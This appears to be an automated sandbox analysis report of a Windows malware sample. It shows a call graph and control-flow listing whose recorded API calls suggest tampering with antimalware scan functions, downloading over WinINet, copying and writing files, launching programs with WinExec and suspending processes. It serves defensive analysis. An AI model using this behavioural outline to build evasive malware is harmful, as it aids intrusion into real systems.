16693 28936cc 13 API calls 16692->16693 16694 2897a6b 16693->16694 16696 2884c24 8 API calls 16694->16696 16698 28936cc 13 API calls 16695->16698 16704 2897ab9 16696->16704 16701 28936cc 13 API calls 16697->16701 16699 2898e8a 16698->16699 16700 2884c24 8 API calls 16699->16700 16714 2898eaa 16700->16714 16702 289813e 16701->16702 16703 2895540 8 API calls 16702->16703 16705 2898153 16703->16705 16706 2887c64 8 API calls 16704->16706 16707 28848f4 8 API calls 16705->16707 16711 2897ae1 16706->16711 16708 2898163 16707->16708 16709 2895698 10 API calls 16708->16709 16710 2898173 16709->16710 16712 2895540 8 API calls 16710->16712 16716 2887c64 8 API calls 16711->16716 16713 2898188 16712->16713 16715 28848f4 8 API calls 16713->16715 16719 28936cc 13 API calls 16714->16719 16717 2898198 16715->16717 16726 2897b1d 16716->16726 16718 2895698 10 API calls 16717->16718 16720 28981a8 16718->16720 16721 2898f03 16719->16721 16722 2884c24 8 API calls 16720->16722 16723 2884c24 8 API calls 16721->16723 16724 28981c8 16722->16724 16733 2898f23 16723->16733 16725 2895698 10 API calls 16724->16725 16730 28981d9 16725->16730 16727 2895ac0 8 API calls 16726->16727 16728 2897b5e 16727->16728 16729 2884c24 8 API calls 16728->16729 16736 2897b79 16729->16736 16731 2887c64 8 API calls 16730->16731 16732 289820e 16731->16732 16735 2884c24 8 API calls 16732->16735 16734 28936cc 13 API calls 16733->16734 16737 2898f7c 16734->16737 16739 289823e 16735->16739 16736->16219 16736->16564 16738 2884c24 8 API calls 16737->16738 16740 2898f9c 16738->16740 16739->16219 16741 28936cc 13 API calls 16740->16741 16744 2898ff5 16741->16744 16742 289934e 16743 2884c24 8 API calls 16742->16743 16747 289936e 16743->16747 16744->16742 16745 2899034 16744->16745 16746 2884c24 8 API calls 16745->16746 16749 2899054 16746->16749 16748 28936cc 13 API calls 16747->16748 16754 28993c7 16748->16754 16752 28936cc 13 API calls 16749->16752 16750 2899841 16751 2884c24 8 API calls 16750->16751 16758 2899861 16751->16758 16753 28990ad 16752->16753 16755 2884c24 8 API calls 16753->16755 16754->16750 16756 2899406 16754->16756 16760 28990cd 16755->16760 16757 2884c24 8 API calls 16756->16757 16762 2899426 16757->16762 16759 28936cc 13 API calls 16758->16759 16770 28998ba 16759->16770 16761 28936cc 13 API calls 16760->16761 16764 2899126 16761->16764 16767 28936cc 13 API calls 16762->16767 16763 2899a11 16765 2884c24 8 API calls 16763->16765 16766 2884c24 8 API calls 16764->16766 16772 2899a46 16765->16772 16773 289915b 16766->16773 16768 289947f 16767->16768 16769 2884c24 8 API calls 16768->16769 16776 289949f 16769->16776 16770->16763 16771 2884c24 8 API calls 16770->16771 16779 2899919 16771->16779 16774 28936cc 13 API calls 16772->16774 16775 28936cc 13 API calls 16773->16775 16780 2899a9f 16774->16780 16781 28991b4 16775->16781 16777 28936cc 13 API calls 16776->16777 16778 28994f8 WinExec 16777->16778 16782 28945f8 lstrcmpi CloseHandle CloseHandle 16778->16782 16785 28936cc 13 API calls 16779->16785 16786 28936cc 13 API calls 16780->16786 16783 28936cc 13 API calls 16781->16783 16784 289950e OpenProcess NtSuspendProcess 16782->16784 16787 28991e7 16783->16787 16788 2884c24 8 API calls 16784->16788 16789 2899972 16785->16789 16790 2899ad2 16786->16790 16791 2884c24 8 API calls 16787->16791 16794 2899555 16788->16794 16792 2884c24 8 API calls 16789->16792 16793 2884c24 8 API calls 16790->16793 16796 2899207 16791->16796 16797 2899992 16792->16797 16795 2899af2 16793->16795 16798 28936cc 13 API calls 16794->16798 16801 28936cc 13 API calls 16795->16801 16802 28936cc 13 API calls 16796->16802 16800 28936cc 13 API calls 16797->16800 16799 28995ae 16798->16799 16803 2884dbc 8 API calls 16799->16803 16804 28999eb 16800->16804 16812 2899b4b 16801->16812 16809 2899260 16802->16809 16805 28995b8 16803->16805 16806 2882fc4 18 API calls 16804->16806 16807 2893f94 38 API calls 16805->16807 16808 28999f8 16806->16808 16810 28995c4 16807->16810 16811 2884dbc 8 API calls 16808->16811 16815 28936cc 13 API calls 16809->16815 16813 2884c24 8 API calls 16810->16813 16814 2899a09 16811->16814 16817 28936cc 13 API calls 16812->16817 16822 28995e4 16813->16822 16816 28948a4 17 API calls 16814->16816 16819 2899293 16815->16819 16816->16763 16818 2899b7e 16817->16818 16820 2884c24 8 API calls 16818->16820 16821 2884c24 8 API calls 16819->16821 16825 2899b9e 16820->16825 16824 28992b3 16821->16824 16823 28936cc 13 API calls 16822->16823 16828 289963d 16823->16828 16826 28936cc 13 API calls 16824->16826 16827 28936cc 13 API calls 16825->16827 16831 289930c 16826->16831 16830 2899bf7 16827->16830 16829 28936cc 13 API calls 16828->16829 16832 2899670 16829->16832 16834 28936cc 13 API calls 16830->16834 16835 28936cc 13 API calls 16831->16835 16833 2884c24 8 API calls 16832->16833 16842 2899690 16833->16842 16836 2899c2a 16834->16836 16837 289933f 16835->16837 16838 2884c24 8 API calls 16836->16838 16839 2884dbc 8 API calls 16837->16839 16844 2899c4a 16838->16844 16840 2899349 16839->16840 16841 2894f34 20 API calls 16840->16841 16841->16742 16843 28936cc 13 API calls 16842->16843 16846 28996e9 16843->16846 16845 28936cc 13 API calls 16844->16845 16848 2899ca3 16845->16848 16847 28936cc 13 API calls 16846->16847 16849 289971c 16847->16849 16851 28936cc 13 API calls 16848->16851 16850 2884c24 8 API calls 16849->16850 16856 289973c 16850->16856 16852 2899cd6 16851->16852 16853 28936cc 13 API calls 16852->16853 16854 2899d09 16853->16854 16855 2884c24 8 API calls 16854->16855 16861 2899d29 16855->16861 16857 28936cc 13 API calls 16856->16857 16858 2899795 16857->16858 16859 28936cc 13 API calls 16858->16859 16860 28997c8 16859->16860 16862 2884c24 8 API calls 16860->16862 16863 28936cc 13 API calls 16861->16863 16866 28997e8 16862->16866 16864 2899d82 16863->16864 16865 2884c24 8 API calls 16864->16865 16868 2899da2 16865->16868 16867 28936cc 13 API calls 16866->16867 16867->16750 16869 28936cc 13 API calls 16868->16869 16870 2899dfb 16869->16870 16871 28936cc 13 API calls 16870->16871 16872 2899e2e 16871->16872 16873 28936cc 13 API calls 16872->16873 16874 2899e61 16873->16874 16875 28936cc 13 API calls 16874->16875 16876 2899e94 16875->16876 16877 28936cc 13 API calls 16876->16877 16878 2899ec7 16877->16878 16879 28936cc 13 API calls 16878->16879 16880 2899efa 16879->16880 16881 28936cc 13 API calls 16880->16881 16882 2899f2d 16881->16882 16883 28936cc 13 API calls 16882->16883 16884 2899f60 16883->16884 16885 28936cc 13 API calls 16884->16885 16886 2899f93 16885->16886 16887 28936cc 13 API calls 16886->16887 16888 2899fc6 16887->16888 16889 28936cc 13 API calls 16888->16889 16890 2899ff9 16889->16890 16891 28936cc 13 API calls 16890->16891 16892 289a02c 16891->16892 16893 28936cc 13 API calls 16892->16893 16894 289a05f 16893->16894 16895 28936cc 13 API calls 16894->16895 16896 289a092 16895->16896 16897 28936cc 13 API calls 16896->16897 16898 289a0c5 16897->16898 16899 28936cc 13 API calls 16898->16899 16900 289a0f8 16899->16900 16901 28936cc 13 API calls 16900->16901 16902 289a12b 16901->16902 16903 28936cc 13 API calls 16902->16903 16904 289a15e 16903->16904 16905 28936cc 13 API calls 16904->16905 16906 289a191 16905->16906 16907 28936cc 13 API calls 16906->16907 16908 289a1c4 16907->16908 16909 28936cc 13 API calls 16908->16909 16910 289a1f7 16909->16910 16911 28936cc 13 API calls 16910->16911 16912 289a22a 16911->16912 16913 28936cc 13 API calls 16912->16913 16914 289a25d 16913->16914 16915 28936cc 13 API calls 16914->16915 16916 289a290 16915->16916 16917 28936cc 13 API calls 16916->16917 16918 289a2c3 16917->16918 16919 28936cc 13 API calls 16918->16919 16920 289a2f6 16919->16920 16921 28936cc 13 API calls 16920->16921 16922 289a329 16921->16922 16923 28936cc 13 API calls 16922->16923 16924 289a35c 16923->16924 16925 28936cc 13 API calls 16924->16925 16926 289a38f 16925->16926 16927 28936cc 13 API calls 16926->16927 16928 289a3c2 16927->16928 16929 28936cc 13 API calls 16928->16929 16930 289a3f5 16929->16930 16931 28936cc 13 API calls 16930->16931 16932 289a428 16931->16932 16933 28936cc 13 API calls 16932->16933 16934 289a45b 16933->16934 16935 28936cc 13 API calls 16934->16935 16936 289a48e 16935->16936 16937 28936cc 13 API calls 16936->16937 16938 289a4c1 16937->16938 16939 28936cc 13 API calls 16938->16939 16940 289a4f4 16939->16940 16941 28936cc 13 API calls 16940->16941 16942 289a527 16941->16942 16943 28936cc 13 API calls 16942->16943 16944 289a55a 16943->16944 16945 28936cc 13 API calls 16944->16945 16946 289a58d 16945->16946 16947 28936cc 13 API calls 16946->16947 16948 289a5c0 16947->16948 16949 28936cc 13 API calls 16948->16949 16950 289a5f3 16949->16950 16951 2884c24 8 API calls 16950->16951 16952 289a613 16951->16952 16953 28936cc 13 API calls 16952->16953 16954 289a66c 16953->16954 16955 2884c24 8 API calls 16954->16955 16956 289a68c 16955->16956 16957 28936cc 13 API calls 16956->16957 16958 289a6e5 16957->16958 16959 28936cc 13 API calls 16958->16959 16960 289a718 16959->16960 16961 28936cc 13 API calls 16960->16961 16962 289a74b 16961->16962 16963 28936cc 13 API calls 16962->16963 16964 289a77e 16963->16964 16965 28936cc 13 API calls 16964->16965 16966 289a7b1 ExitProcess 16965->16966 16968 28936e7 16967->16968 16994 288cab0 SetErrorMode 16968->16994 16970 2893720 16971 2893777 16970->16971 16972 2893725 GetModuleHandleA 16970->16972 16997 28848c4 16971->16997 16974 2893738 16972->16974 16975 289376c FreeLibrary 16972->16975 16977 2893741 GetProcAddress 16974->16977 16975->16971 16978 289375b 16977->16978 16978->16975 16980 2884c35 16979->16980 16981 2884c5b 16980->16981 16982 2884c72 16980->16982 17040 2884f90 16981->17040 17046 2884964 16982->17046 16985 2884c68 16986 2884ca3 16985->16986 16987 28848f4 8 API calls 16985->16987 16987->16986 16989 28848f8 16988->16989 16990 2884908 16988->16990 16989->16990 16992 2884964 8 API calls 16989->16992 16991 2884936 16990->16991 16993 2882c5c 8 API calls 16990->16993 16991->16356 16992->16990 16993->16991 17001 2884d64 16994->17001 16998 28848ca 16997->16998 16999 28848f0 16998->16999 17003 2882c5c 16998->17003 16999->16226 17002 2884d68 LoadLibraryA 17001->17002 17002->16970 17004 2882c6a 17003->17004 17005 2882c60 17003->17005 17004->16998 17005->17004 17006 2882cf5 17005->17006 17010 288676c 17005->17010 17017 2882cc4 17006->17017 17011 288677b 17010->17011 17013 2886786 17010->17013 17011->17006 17012 28867ab 17012->17006 17013->17012 17020 28866a0 17013->17020 17015 288678b TlsGetValue 17016 288679a 17015->17016 17016->17006 17037 2884888 17017->17037 17021 28866a6 17020->17021 17023 28866bf 17021->17023 17024 28866d4 17021->17024 17026 2884894 17021->17026 17023->17024 17025 2884894 7 API calls 17023->17025 17024->17015 17025->17024 17027 2884888 17026->17027 17030 28847ac 17027->17030 17031 28847c0 17030->17031 17032 2884720 5 API calls 17031->17032 17033 28847e7 17031->17033 17032->17033 17034 2884833 FreeLibrary 17033->17034 17035 2884857 ExitProcess 17033->17035 17034->17033 17038 28847ac 7 API calls 17037->17038 17039 2882ccf 17038->17039 17039->16998 17041 2884f9d 17040->17041 17045 2884fcd 17040->17045 17043 2884fa9 17041->17043 17044 2884964 8 API calls 17041->17044 17043->16985 17044->17045 17051 28848a0 17045->17051 17047 2884968 17046->17047 17048 288498c 17046->17048 17055 2882c40 17047->17055 17048->16985 17050 2884975 17050->16985 17052 28848c1 17051->17052 17053 28848a6 17051->17053 17052->17043 17053->17052 17054 2882c5c 8 API calls 17053->17054 17054->17052 17056 2882c57 17055->17056 17059 2882c44 17055->17059 17056->17050 17057 2882c4e 17057->17050 17058 2882cf5 17061 2882cc4 7 API calls 17058->17061 17059->17057 17059->17058 17060 288676c 8 API calls 17059->17060 17060->17058 17062 2882d16 17061->17062 17062->17050 17063 2881757 17064 2881998 17063->17064 17065 288176c 17063->17065 17066 2881ab0 17064->17066 17067 2881968 17064->17067 17076 28817fb Sleep 17065->17076 17077 288177e 17065->17077 17069 2881ab9 17066->17069 17070 28816b4 VirtualAlloc 17066->17070 17071 2881977 Sleep 17067->17071 17081 28819b6 17067->17081 17068 288178d 17072 288170f 17070->17072 17073 28816df 17070->17073 17074 288198d Sleep 17071->17074 17071->17081 17075 2881674 2 API calls 17073->17075 17074->17067 17079 28816ef 17075->17079 17076->17077 17080 2881814 Sleep 17076->17080 17077->17068 17078 288185c 17077->17078 17082 288183a Sleep 17077->17082 17086 28815fc VirtualAlloc 17078->17086 17087 2881868 17078->17087 17079->17072 17080->17065 17083 28815fc VirtualAlloc 17081->17083 17085 28819d4 17081->17085 17082->17078 17084 2881850 Sleep 17082->17084 17083->17085 17084->17077 17086->17087

                                                                Executed Functions

                                                                Function 02895DE4 Relevance: 183.9, APIs: 7, Strings: 96, Instructions: 3639sleepfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 2895de4-2895de7 1 2895dec-2895df1 0->1 1->1 2 2895df3-2895e0e call 288304c 1->2 5 289a7b8 2->5 6 2895e14-28967b2 call 2883024 call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 288304c 2->6 305 28967c5-28967cf call 28848f4 6->305 306 28967b4-28967c3 call 28848f4 6->306 310 28967d4-2896a01 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2887da0 call 2882fc4 call 28881e0 call 28848f4 305->310 306->310 375 2896a08-2896aa6 call 2884dc4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2888110 310->375 376 2896a03-2896a06 310->376 395 2896bb9-2896d1a call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2887da0 call 2882fc4 call 2883300 call 28836bc call 2882d28 call 28834cc call 2882d28 call 2884f90 375->395 396 2896aac-2896b7f call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2883300 call 28836bc call 2882d28 call 28834cc call 2882d28 call 2884f90 375->396 376->375 487 2896d1c-2896d1f 395->487 488 2896d21-2896dc5 call 2884dbc call 2883454 call 2882d28 call 2883474 call 2882d28 call 2895300 call 2885a4c call 28848f4 call 2887da0 call 2895b34 call 28848f4 call 289521c 395->488 449 2896b81-2896b84 396->449 450 2896b86-2896bb4 call 2884dbc call 2883454 call 2882d28 call 2883474 call 2882d28 396->450 449->450 472 2896fdb-28971dc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 28958b0 450->472 472->5 621 28971e2-289752d call 2887da0 call 2895bdc call 28848f4 call 2895ac0 call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884b28 call 2895300 call 2885a4c call 28848f4 * 9 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 28848f4 call 2884d64 call 2884a98 call 2888134 472->621 487->488 538 2896dcb-2896e23 call 2895974 call 28848f4 Sleep call 2884a98 * 2 call 28936cc 488->538 539 2896e8e-2896e93 call 28958b0 488->539 567 2896e28-2896e89 call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc 538->567 545 2896e98-2896e9a 539->545 545->472 546 2896ea0-2896f16 call 2895300 call 2885a4c call 28848f4 call 2887da0 call 2895b34 call 28848f4 call 289521c 545->546 593 2896f38-2896fd6 Sleep call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc 546->593 594 2896f18-2896f33 call 2895974 call 28848f4 546->594 567->539 593->472 594->593 727 289752f-289754c call 2884d64 call 2884a98 call 28882c8 621->727 728 2897551-2897564 621->728 727->728 730 289756b-289760c call 2884dc4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 728->730 731 2897566-2897569 728->731 754 2897cbb-2897e35 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 730->754 755 2897612-289766d call 2895ac0 call 2884c24 call 2884d64 call 2884a98 call 2888110 730->755 731->730 844 2897e3b-2897e80 call 2884c24 call 2884d64 call 2884a98 call 2888110 754->844 845 2898baa-2899004 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2895580 call 28848f4 call 2887da0 call 2895b34 call 28848f4 call 2895ac0 call 2895910 call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 754->845 755->754 777 2897673-28977ab call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2888110 755->777 854 28977ad-28977cf call 2884d64 call 2884a98 call 2895698 777->854 855 28977d4-2897bb8 call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884d64 call 2882fc4 call 2884d64 CopyFileA call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 289540c call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2883c30 call 2884c24 call 288304c call 2887c64 call 2884bb0 call 288304c call 2887c64 call 2884bb0 call 2895ac0 call 2884c24 call 2884d64 call 2884a98 call 2883c60 777->855 844->845 878 2897e86-2897ea3 call 2884a98 call 2888134 844->878 1272 289900a-2899019 call 2884cb0 845->1272 1273 289934e-28993d6 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 845->1273 854->855 855->754 894 2897ea9-289827d call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2895540 call 28848f4 call 2895698 call 2895540 call 28848f4 call 2895698 call 2884c24 call 2895698 call 2883c30 call 288304c call 2887c64 call 2884c24 call 2884d64 call 2884a98 call 2883c60 878->894 895 2898535-2898744 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2883c30 call 288304c call 2887c64 call 2884c24 call 2884d64 call 2884a98 call 2883c60 878->895 895->845 1272->1273 1279 289901f-289902e call 2884cb0 1272->1279 1307 28993dc-28993eb call 2884cb0 1273->1307 1308 2899841-28998c9 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 1273->1308 1279->1273 1284 2899034-2899349 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884dbc call 2894f34 1279->1284 1284->1273 1307->1308 1316 28993f1-2899400 call 2884cb0 1307->1316 1358 28998cf-28998de call 2884cb0 1308->1358 1359 2899a11-2899e29 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc 1308->1359 1316->1308 1325 2899406-289983c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc WinExec call 28945f8 OpenProcess NtSuspendProcess call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884dbc call 2893f94 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc 1316->1325 1325->1308 1358->1359 1371 28998e4-28998f3 call 2884cb0 1358->1371 1692 2899e2e-289a65b call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 1359->1692 1371->1359 1383 28998f9-2899a0c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2882fc4 call 2884dbc call 28948a4 1371->1383 1383->1359 1938 289a660-289a667 call 28936cc 1692->1938 1940 289a66c-289a6d4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 1938->1940 1952 289a6d9-289a6e0 call 28936cc 1940->1952 1954 289a6e5-289a707 call 2884a98 * 2 1952->1954 1958 289a70c-289a713 call 28936cc 1954->1958 1960 289a718-289a7ac call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc 1958->1960 1978 289a7b1-289a7b3 ExitProcess 1960->1978
                                                                APIs
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C), ref: 02896DF0
                                                                  • Part of subcall function 0289521C: InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0289522C
                                                                  • Part of subcall function 0289521C: InternetOpenUrlA.WININET(028DDAA4,00000000,00000000,00000000,00000200,00000000), ref: 0289524F
                                                                  • Part of subcall function 0289521C: InternetCloseHandle.WININET(028DDAA4), ref: 028952E1
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C), ref: 02896F3D
                                                                  • Part of subcall function 02895974: InternetCloseHandle.WININET(028DD4D0), ref: 02895A6F
                                                                  • Part of subcall function 02888134: GetFileAttributesA.KERNEL32(00000000,?,0289752B,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,ScanString,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 0288813F
                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 02897929
                                                                  • Part of subcall function 02895698: _hwrite.KERNEL32(00000000,00000000,?), ref: 028956EF
                                                                  • Part of subcall function 02895698: _lclose.KERNEL32(00000000), ref: 028956F5
                                                                Strings
